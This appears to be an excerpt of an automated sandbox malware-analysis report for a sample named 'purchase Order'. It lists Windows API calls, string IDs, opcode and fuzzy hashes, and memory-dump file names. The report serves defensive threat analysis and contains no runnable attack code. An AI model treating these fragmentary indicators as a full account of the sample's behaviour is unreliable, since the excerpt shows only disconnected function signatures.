                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 771613262b7b2d5cd613e360c1d01ec761606dab8ec8451d099057ca23e51fe4
                                                        • Instruction ID: a54460e6f4a72edcb23915859daa7d7d813bb3c7f3c96d3e0cd0fa3c35d44db6
                                                        • Opcode Fuzzy Hash: 771613262b7b2d5cd613e360c1d01ec761606dab8ec8451d099057ca23e51fe4
                                                        • Instruction Fuzzy Hash: B0218E72600108BFDF14DFA8C942AAEB7BDFF44340F11446AF609E3190DB71BE569AA4
                                                        APIs
                                                        • SendMessageW.USER32(00000402,00000000,00000000), ref: 00C987F3
                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00C98834
                                                        • SendMessageW.USER32(0000000C,00000000,?), ref: 00C9885C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: a5b3d231fb1ba1c0e1dab0985aeb04f82812b0734adc7a00479d935824738f45
                                                        • Instruction ID: 461404f5a71b03cd767504abe125110772d8684b781573581012dd6a5698f629
                                                        • Opcode Fuzzy Hash: a5b3d231fb1ba1c0e1dab0985aeb04f82812b0734adc7a00479d935824738f45
                                                        • Instruction Fuzzy Hash: BC216A75600510EFDB10EF65D885E2AB7E9FB0A710B018551F94ADB6B0CB30FC51DBA4
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CAA46D
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CAA482
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CAA48F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: dffd37d4d45351dcda6c3002cf0e537a6c8c217ae2823fa3db38fa85c99cacb0
                                                        • Instruction ID: 0e19f9ff26936e474c386cf872303c97ba11564dc750da0a88d20fbc0e885d1f
                                                        • Opcode Fuzzy Hash: dffd37d4d45351dcda6c3002cf0e537a6c8c217ae2823fa3db38fa85c99cacb0
                                                        • Instruction Fuzzy Hash: 8E11CA71240309BEEF245F75CC45FAB3B69EF89758F014128FA55A6091D7B2E811D724
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00CA9699
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CA96A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: @U=u$edit
                                                        • API String ID: 2978978980-590756393
                                                        • Opcode ID: 7f0d043d8e6ff0e15826d87903dfff500f29d5a9cca8d8806c2b6efc3d7b8cf8
                                                        • Instruction ID: e4cfe889a68255c97d72a4d822de4c571b159de0c96871be599c0eb840daa40d
                                                        • Opcode Fuzzy Hash: 7f0d043d8e6ff0e15826d87903dfff500f29d5a9cca8d8806c2b6efc3d7b8cf8
                                                        • Instruction Fuzzy Hash: 10116A7150020AAAEB509FA4DC46FEB3B6AEF0637CF504724F975971E0C7359C50A760
                                                        APIs
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C7B7EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 3850602802-2258501812
                                                        • Opcode ID: 2e394ddf0db060091b9c2be392972f1037ff7da7b402059bb9f81b16cac0f937
                                                        • Instruction ID: 202618fe36d42494119a4911eb65a4bc47b839db605ffc81ba5ea4d96af2fe50
                                                        • Opcode Fuzzy Hash: 2e394ddf0db060091b9c2be392972f1037ff7da7b402059bb9f81b16cac0f937
                                                        • Instruction Fuzzy Hash: 7401D471641118ABCB84EBA4CC92EFE3379BF45350B04461DF576672E2EF705D08A7A0
                                                        APIs
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C7B6EB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 3850602802-2258501812
                                                        • Opcode ID: e827d79ab374c3078eb4d2a5f249c93576c7be669a7d94e1931f926b90900fdf
                                                        • Instruction ID: 93019303111b5a5693a8acb0df9e14ec048ac05ea92d93bc7d4620acfc3f326d
                                                        • Opcode Fuzzy Hash: e827d79ab374c3078eb4d2a5f249c93576c7be669a7d94e1931f926b90900fdf
                                                        • Instruction Fuzzy Hash: D80162B1642108AFCB48EBA4C952FFF73B8AF05344F104029B656B31A1DF545F18A7B5
                                                        APIs
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C7B76C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 3850602802-2258501812
                                                        • Opcode ID: c80560cab289a2ab51a7539222aead7970923faaaa5c4e48bfb2a040bcc7fa6a
                                                        • Instruction ID: d401786eecc3012448b51439d1d619aabc56f149c93fcba6dbe080858ecc4267
                                                        • Opcode Fuzzy Hash: c80560cab289a2ab51a7539222aead7970923faaaa5c4e48bfb2a040bcc7fa6a
                                                        • Instruction Fuzzy Hash: 2801D1B1642108ABCB44EBA4C943FFE73ACAF05344F104029B946B31A2DB605F09A7B5
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,00D01628,00CB04C9,000000FC,?,00000000,00000000,?,?,?,00CBE47E,?,?,?,?,?), ref: 00CAD976
                                                        • GetFocus.USER32 ref: 00CAD97E
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                          • Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537
                                                        • SendMessageW.USER32(015E7710,000000B0,000001BC,000001C0), ref: 00CAD9F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3601265619-2594219639
                                                        • Opcode ID: c0262c3d742553083c94cc11e29a68845f4b63f7fc5f926b71d231b9cecd5681
                                                        • Instruction ID: 488c1034cff1194e49d4c1daf4853037a4615ec861417e216f26412080dd0849
                                                        • Opcode Fuzzy Hash: c0262c3d742553083c94cc11e29a68845f4b63f7fc5f926b71d231b9cecd5681
                                                        • Instruction Fuzzy Hash: AB0144352006018BC7149B38DC84B6A77AABB8A314F58076DE86BC73A5DB319D46CB51
                                                        APIs
                                                          • Part of subcall function 00C4103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C41052
                                                        • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00C4101C
                                                        • GetParent.USER32 ref: 00CB2026
                                                        • InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?), ref: 00CB202D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$InvalidateParentRectTimeout
                                                        • String ID: @U=u
                                                        • API String ID: 3648793173-2594219639
                                                        • Opcode ID: eb4de2609fd50b907992d9ee873e3e10f810cb30bf9d0fdb2a8e2e602312ae1f
                                                        • Instruction ID: d46b68fbdaba90d22e7b010b4d4260f4238c8d92687f710fc5c7366e14ec19a2
                                                        • Opcode Fuzzy Hash: eb4de2609fd50b907992d9ee873e3e10f810cb30bf9d0fdb2a8e2e602312ae1f
                                                        • Instruction Fuzzy Hash: 22F0A9301002C8FBEF202F60EC49F9A7BA8BB12380F144425F9C19B0A0C6B398C1EB60
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C62350,?), ref: 00C622A1
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00C622A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoInitialize$combase.dll
                                                        • API String ID: 2574300362-340411864
                                                        • Opcode ID: 502ceb06dea6d6313f7a3a5422c9254e093a7e422252e3c9534224a23cfcb8a2
                                                        • Instruction ID: f131501f6e312374cd381e5756ed4f64e9870ee29194a818d5c0fd0c27812a17
                                                        • Opcode Fuzzy Hash: 502ceb06dea6d6313f7a3a5422c9254e093a7e422252e3c9534224a23cfcb8a2
                                                        • Instruction Fuzzy Hash: 59E09A70694701ABDB609F71EC89F693A69B700716F108034F11BE51A0DFB54455DF66
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C62276), ref: 00C62376
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00C6237D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 2574300362-2819208100
                                                        • Opcode ID: db153823f0e9a532c1a84a985c535c626e289a7391b1412e07f0c2de69c8e215
                                                        • Instruction ID: 93ec0b48a29012b002c0abe5d827b90adc5576a7f051dea65de2e58d970afefa
                                                        • Opcode Fuzzy Hash: db153823f0e9a532c1a84a985c535c626e289a7391b1412e07f0c2de69c8e215
                                                        • Instruction Fuzzy Hash: BDE0B6B0544300AFDB205F61ED0DF183A68B704702F104438F20ED22B4CBB99500DA26
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: 28d9f61e1eb711909354d4c8a1afb993dda8d1b47e52b4301031c266cf7b0dd0
                                                        • Instruction ID: 3c0938ce2ddea725ed023461cb088551bcc2380ef2544226d9e6705d433d6b1e
                                                        • Opcode Fuzzy Hash: 28d9f61e1eb711909354d4c8a1afb993dda8d1b47e52b4301031c266cf7b0dd0
                                                        • Instruction Fuzzy Hash: 4AE012B180462CEBCB549791CD45DFA777CA704742F5400E2F987E1000E6369BC4AA23
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C442EC,?,00C442AA,?), ref: 00C44304
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C44316
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: c92d98b26a843ad6a4564f713d2c733cdf52a4f0d0c315eed99d50548ab00279
                                                        • Instruction ID: bcebd636bd0623aa029d3c62957940b43dfe4d33c07993b9136b5bdac22ba1f2
                                                        • Opcode Fuzzy Hash: c92d98b26a843ad6a4564f713d2c733cdf52a4f0d0c315eed99d50548ab00279
                                                        • Instruction Fuzzy Hash: BFD0A770800712EFC7244F20EC0CB5976D4BB04721B244439F552D2170D7B0C9808610
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00CA21FB,?,00CA23EF), ref: 00CA2213
                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00CA2225
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetProcessId$kernel32.dll
                                                        • API String ID: 2574300362-399901964
                                                        • Opcode ID: 6a64d09941bdddea2ad8e3c127ae45ef5eeee342456f9051d2e9af7797ec7e5c
                                                        • Instruction ID: 670b682806d1b64b7aed3ab24141e0bc8ef2457363061ba8cb44694257fba7d5
                                                        • Opcode Fuzzy Hash: 6a64d09941bdddea2ad8e3c127ae45ef5eeee342456f9051d2e9af7797ec7e5c
                                                        • Instruction Fuzzy Hash: 8CD0A7348007279FD7215F34FC08B5A76D8EB05325B154439E852E2150D770D8C08750
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00C441BB,00C44341,?,00C4422F,?,00C441BB,?,?,?,?,00C439FE,?,00000001), ref: 00C44359
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C4436B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 4b39e75aece6484001a67c639c4f8169c8a6734c8b3907d20e3674704dfdfbe8
                                                        • Instruction ID: 304c90914b7adc2e6df0f7ec894ff8a9382b59d41964f10ee3539d3fcea13272
                                                        • Opcode Fuzzy Hash: 4b39e75aece6484001a67c639c4f8169c8a6734c8b3907d20e3674704dfdfbe8
                                                        • Instruction Fuzzy Hash: A0D0A730C00712AFC7244F30EC09B5976D4BB10B25B24C439E492D2160D7B0D9808610
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00C8052F,?,00C806D7), ref: 00C80572
                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00C80584
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1587604923
                                                        • Opcode ID: ff565da4d52349b04838a9cbcfa19ec9ea4998c020a7d9d633f483aaccd07934
                                                        • Instruction ID: e66bd1ddd6d7f2d013a8e93dd96be5038aa4dfe683dc03ec2bcb875326b0eee0
                                                        • Opcode Fuzzy Hash: ff565da4d52349b04838a9cbcfa19ec9ea4998c020a7d9d633f483aaccd07934
                                                        • Instruction Fuzzy Hash: 14D05E304103329EC7606FA0E808B5A77E4AB04314F248439E99292554D670C5C48B24
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00C8051D,?,00C805FE), ref: 00C80547
                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00C80559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                        • API String ID: 2574300362-1071820185
                                                        • Opcode ID: bdd7831cf293cd03a69a6df9a28d6d420c95e61cac296791b527add3ed91f8a4
                                                        • Instruction ID: 16af77efc29dcd2a168a39966c57c8691d920d3ff04dcf77f5191da9cde913a2
                                                        • Opcode Fuzzy Hash: bdd7831cf293cd03a69a6df9a28d6d420c95e61cac296791b527add3ed91f8a4
                                                        • Instruction Fuzzy Hash: 36D0A7304107229FC7609F60EC08B5977E4AB00315F24C43DE467D2150D670CD848B24
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C9ECBE,?,00C9EBBB), ref: 00C9ECD6
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C9ECE8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        • Opcode ID: 358c8f16d4b8981e5aa882eb61ba06a3c9be396310c713603de7f35b4b441b6e
                                                        • Instruction ID: f517c70e5c402d49637f1e1f45521ee452c27beffb65a00c77167cc00920d66c
                                                        • Opcode Fuzzy Hash: 358c8f16d4b8981e5aa882eb61ba06a3c9be396310c713603de7f35b4b441b6e
                                                        • Instruction Fuzzy Hash: A4D0A7308007239FCF209F60EC4CB5A7AE4AB10311B148839F896D2150DB70C8808610
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00C9BAD3,00000001,00C9B6EE,?,00CDDC00), ref: 00C9BAEB
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C9BAFD
                                                        Strings
                                                        Memory Dump Source
